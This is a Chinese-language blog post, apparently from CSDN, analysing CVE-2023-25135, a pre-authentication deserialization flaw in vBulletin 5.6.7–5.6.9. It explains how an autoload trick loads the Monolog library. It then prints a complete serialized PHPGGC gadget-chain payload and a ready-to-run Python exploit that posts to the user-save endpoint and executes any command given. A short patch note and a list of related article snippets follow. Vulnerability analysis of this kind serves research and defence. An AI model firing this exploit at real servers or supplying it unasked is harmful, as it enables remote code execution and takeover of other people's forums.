漏洞分析|vBulletin反序列化代码执行漏洞(CVE-2023-25135)

最新推荐文章于 2024-05-14 04:36:16 发布
最新推荐文章于 2024-05-14 04:36:16 发布
阅读量974 收藏 18
点赞数 22
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/135307780
版权

1.漏洞描述

vBulletin是一个强大,灵活并可完全根据自己的需要定制的商业论坛程序(非开源),它使用PHP脚本语言编写,并且基于以高效和高速著称的数据库引擎MySQL。

vBulletin 允许未经身份验证的远程攻击者通过触发反序列化的 HTTP 请求执行任意代码。发生这种情况是因为 verify_serialized 通过调用 unserialize 然后检查错误来检查值是否已序列化。

2.影响版本

vbulletin 5.6.7

vbulletin 5.6.8

vbulletin 5.6.9

3.影响范围

 

4.漏洞分析

在vBulletin中用户注册时涉及vB_DataManager_User类的实例化,在该类中定义了validfield属性,每次实例化对象时候都会检查对应的属性是否正确。其中在该类中有一处searchprefs字段,每次实例化对象时候采用了一个verify_serialized函数检查数据,我们先看看。

进入verify_serialized函数

从这里可以看出,vBulletin通过调用了unserialize函数来检查传入searchprefs的数据是否序列化。searchprefs这个字段可以由用户自由控制,这就导致了漏洞利用的可能性。

然而在vbulletin中,几乎每个类都使用了vB_Trait_NoSerialize特性,一些常见的魔术方法如__wakeup(),__ unserialize()等被调用时,只会抛出异常。这就使得通过类中相关魔术方法构造新的利用链的方法难以行得通。

基于此,那只能尝试PHPGGC中能否生成有效的利用载荷。查阅资料发现,在vBulletin中包含有PHPGGC支持的Monolog库,其物理路径在packages/ googlelogin /vendor/monolog。但我们发现,vBulletin中默认是禁用googlelogin包的,其中的googlelogin/vendor/autoload.php文件不能被加载(用于加载Monolog各个类),monolog库就不能被访问到,PHPGGC产生的monolog/rce*利用链便注定不成功。

到这里,不难发现只要将googlelogin/vendor/autoload.php这个文件引入,PHPGGC产生的载荷就可以成功利用。于是,我们开始寻找vBulletin中用于加载各类的autoload方法,看看有没有可以将该文件引入的可能。在vBulletin中autoload方法可以归结为以下代码:

由此,可以了解到,给定一个类名,在vBulletin中即可引入包含进以该类名分解构成的文件。比如,vBulletin第一次实例化vB_DataManager_User时,PHP还不知道这个类。因此,它调用每个类的autoload,包括vB:: autoload(),它将会引入加载包含该类的文件vB /datamanager/user.php。这样一来已经定义了该类,PHP就可以实例化它。

利用此原理, 在vBulletin实例化vB_DataManager_User类,调用unserialize()方法检查searchprefs字段是否序列化时候,如果在searchprefs字段内容里面填写的是一个序列化的精心构造的类名,此时unserialize()方法会反序列化该类名的对象,整个过程中会调用到vB:: autoload(),从而引入加载以该类名分解构成的文件。即使这个类名是不真实存在的,它也只会返回一个__PHP_Incomplete_Class的实例,反序列化的过程不会崩溃。

反序列化过程不会崩溃,意味着在这个过程中可以引入任意的文件提供使用。这样一来,便可以将之前利用PHPGGC monolog库失败所缺少的packages/ googlelogin /vendor/ autoload .php文件成功引入。

据此,可以构造一个假的类名googlelogin_vendor_autoload 用于引入/googlelogin/vendor/autoload.php文件,将其序列化

O:27:"googlelogin_vendor_autoload":0:{}

将这个payload写入searchprefs中,将会执行到verify_serialized()方法中调用unseriliaze()检查其是否已经序列化。unserialize()方法中会尝试加载googlelogin_vendor_autoload这个类,但是其不存在。在这个过程中,vB:: autolload()被调用,并且将/googlelogin/vendor/autoload.php文件成功引入包含,这个文件真实存在,但是googlelogin_vendor_autoload这个类不存在,unserilize()只会返回一个__PHP_Incomplete_Class的实例,程序依然在执行。

如此一来,/packages/ googlelogin /vendor/ autolload .php文件被成功引入,monolog类便能够成功使用,PHPGGC中monolog/rce*利用链便可以生效。因此,可以构造一个数组,第一部分是之前构造的假的类名,用于能够使用monolog类,第二部分是PHPGGC生成的monolog/rce*的payload

a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:4;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}
Poc:
#!/usr/bin/env python3
# Exploit for CVE-2023-25135: vBulletin pre-authentication RCE

from ten import *

@entry
@arg("url", "Target URL")
@arg("command", "Command to execute")
@arg("proxy", "Proxy to use (optional)")
def main(url: str, command: str, proxy: str = None):
    session = ScopedSession(url)
    
    if proxy:
        session.proxies = proxy
    
    marker = tf.random.string()
    command = f"echo {marker}::; {command}; echo ::{marker}"
    command = to_bytes(command)
    payload = (
        b'a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\\Handle'
        b'r\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\Buf'
        b'ferHandler":7:{s:10:"\x00*\x00handler";r:4;s:13:"\x00*\x00bufferSize";i:-1;s'
        b':9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:[LEN]:"[COMMAND]";s:5:"level";N;}}s:8:"\x00'
        b'*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i'
        b':-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}'
    )
    payload = payload.replace(b"[LEN]", to_bytes(len(command)))
    payload = payload.replace(b"[COMMAND]", command)
    
    response = session.post(
        "/ajax/api/user/save",
        {
            "adminoptions": "",
            "options": "",
            "password": "password",
            "securitytoken": "guest",
            "user[email]": "pown@pown.net",
            "user[password]": "password",
            "user[searchprefs]": payload,
            "user[username]": "toto",
            "userfield": "",
            "userid": "0",
        },
    )
    if not response.code(200):
        failure(f"Exploit failed: unexpected response code ({response.status_code})")
        
    result = response.re.search(fr"{marker}::(.*)::{marker}", re.S)
    if not result:
        failure("Exploit potentially failed: command output not found")
        
    msg_success("Exploit succeeded!")
    
    msg_print("-" * 80)
    msg_print(result.group(1))
    msg_print("-" * 80)
    

main()

5.修复建议

官方已经发布补丁,升级到vBulletin最新版本。可以将searchprefs字段的unserilize()检测是否已序列化方法删除,替换为其他的检测是否已经序列化的方法。

AttackSatelliteLab
关注
  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vBulletin 0 day漏洞PoC公布
systemino的博客
08-16 535
vBulletin是当前最流行的论坛软件之一。安全研究人员Amir Etemadieh在其中发现了一个0 day漏洞,并公布了漏洞细节和PoC 代码。 该0 day漏洞CVE-2019-16759 漏洞补丁的绕过。CVE-2019-16759 漏洞是去年9月公布的一个 0 day漏洞。该漏洞vBulletin模板系统中的漏洞,属于预认证远程代码执行漏洞。攻击者利用该漏洞可以运行恶意代码,并且在无需对受害者网站进行认证的情况下接管论坛。CVE-2019-16759 漏洞细节公布1天后,安全补丁就发布了。
悬镜安全丨Java 反序列化任意代码执行漏洞分析与利用
Anprou的博客
11-14 5925
利用国内的漏洞利用工具
开源论坛程序 vBulletin 被曝严重且详情不明的漏洞,请立即修复
smellycat000的专栏
05-12 739
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队如果你正在运行基于vBulletin软件的在线论坛,那么应确保已安装旨在修复严重漏洞的新补丁。。vBulletin 项目...
2024年HarmonyOS鸿蒙最新Shiro反序列化漏洞原理详解及复现,2024年最新2024-2024历年网易跳动HarmonyOS鸿蒙面试真题解析
最新发布
2401_84852874的博客
05-14 392
生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传。shiro721:1.4.2版本以下仍采用CBC加密,但密钥不再硬编码,因此可以使用padding oracle实现攻击。删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送。AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心。检索rememberMe字段。
反序列化漏洞漏洞复现
来日可期的博客
09-05 2413
反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时,由于缺少必要的验证或过滤,导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞,攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据,使得应用程序在反序列化执行了攻击者所构造的恶意代码,进而导致应用程序受到攻击。
手把手教你PHP反序列化漏洞
qq_62099202的博客
08-08 1407
什么是序列化 序列化是将变量转换为可保存或传输的字符串的过程 反序列化就是在适当的时候把这个字符串再转化成原来的变量使用 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性 简单来说就是将一大段对象压缩成字符串 例如,可以序列化一个对象,然后使用 HTTP 通过 Internet 在客户端和服务器之间传输该对象,或者和其它应用程序共享使用。反之,反序列化根据流重新构造对象
vbulletin-antispam:vBulletin 3.X的反垃圾邮件钩
05-23
vBulletin 3.X反垃圾邮件钩:强化社区安全的利器》 在互联网社区中,垃圾邮件是一个长期困扰用户和管理员的问题。vBulletin是一个广泛使用的论坛软件,它为用户提供了一个互动交流的平台。然而,随着论坛人气的...
vb-422-forum:vBulletin 4.2.2源代码-Forum source code
03-25
vBulletin 4.2.2源代码:深入解析与探讨》 vBulletin是一款广泛使用的论坛软件,以其高效、安全和可定制性而备受青睐。本文将深入剖析vBulletin 4.2.2的源代码,揭示其核心功能和设计原理,为开发者提供宝贵的...
vBulletin-Discord-Bot:从vBulletin论坛获取最新帖子,并将其摘要发布到不和谐频道
05-08
vBulletin-Discord-Bot 从vBulletin RSS feed获取更新,并将更新发布到不和谐的频道中。设置按照以下的说明获取机器人令牌和频道ID: : 同时为您的vBulletin板启用RSS feed,并获取URL。 请参阅: : 更改文件,使...
论坛社区vBulletin v3.0.9.50 NewvBB插件增强包-newvbb30diff.zip
03-21
《论坛社区vBulletin v3.0.9.50 NewvBB插件增强包-newvbb30diff.zip》是一款针对vBulletin论坛系统的插件升级包,主要用于提升论坛的功能性和用户体验。vBulletin是一款广泛使用的开源论坛软件,以其高效、安全和...
vBulletin nual模板
12-06
vBulletin nual模板
vBulletin 5.x 前台RCE漏洞复现
cynthrial的博客
11-07 562
vBulletin 5.x 前台RCE漏洞复现vBulletin 5.x 前台RCE漏洞复现漏洞原理RCE复现参考 vBulletin 5.x 前台RCE漏洞复现 漏洞原理 本质是一个文件包含漏洞,攻击者可以通过包含文件执行任意php代码。 追踪源码分析 如果get参数传入则赋值给$path,继续追踪path变量 如果path的变量长度大于2则判断是否是gif等文件,是的话则返回404 执行前检查路径 #strpos取“/”在path中的位置,如果有/ 则函数为真,不继续执行 linux中路径只能为
vBulletin再修复高危RCE和SQL注入漏洞
NOSEC2019的博客
10-09 697
上个月末,vBulletin刚发布了一个针对高危远程代码执行漏洞的补丁,又在最近发布了一个全新安全补丁,针对了软件中的另外3个严重漏洞。 此次牵涉的漏洞影响vBulletin 5.5.4及以前的版本,最终可导致远程攻击者完全控制目标服务器或窃取敏感用户信息。 vBulletin是一款全球范围内都广泛使用的论坛软件,由PHP编写,目前有超过10万个网站都在使用,其中不乏《财富》500强和Alexa...
初识vbulletin
qq_30007773的博客
01-05 416
1.关于一些简单的变量的输入与输出 1){vb:var variable}输出数组的话就用{va:var variable.foo} 2){vb:raw variable}与{vb:var variable}类似,但是{vb:var variable}是讲HTML标签转义之后的,输出的是文本,不能使用CSS样式,但是安全 PS:普通变量的定义a)在render之前用$templater->r
vbulletin论坛_评论-vBulletin 3.0
culi4814的博客
07-31 658
vbulletin论坛vBulletin is commonly used to create interactive communities on a huge scale. This PHP-based bulletin board has been employed on some of the most well known Websites, including Linkin Park,...
vbulletin论坛_不同的社区论坛类型:vBulletin vs PhpBB与SMF
culu1614的博客
08-10 1048
vbulletin论坛According to Google definition and Wikipedia vBulletin(vB) is a commercial Internet forum software called vBulletin Solutions. Initially vBulletin was designed as forum script including fea...
漏洞分析 | vBulletin反序列化代码执行漏洞(CVE-2023-25135)
WangsuSecurity的博客
11-29 267
vBulletin是一个强大、灵活的商业论坛程序(非开源)。在CVE-2023-25135漏洞中,vBulletin 允许未经过验证的远程攻击者通过触发反序列化的HTTP请求执行任意代码
漏洞分析|Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
xuandaoren的博客
11-10 1730
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如<string>标签中的元素与属性将由StringHandler处理,<struct>标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
vulhub复现CVE-2022-22947
10-13
复现CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值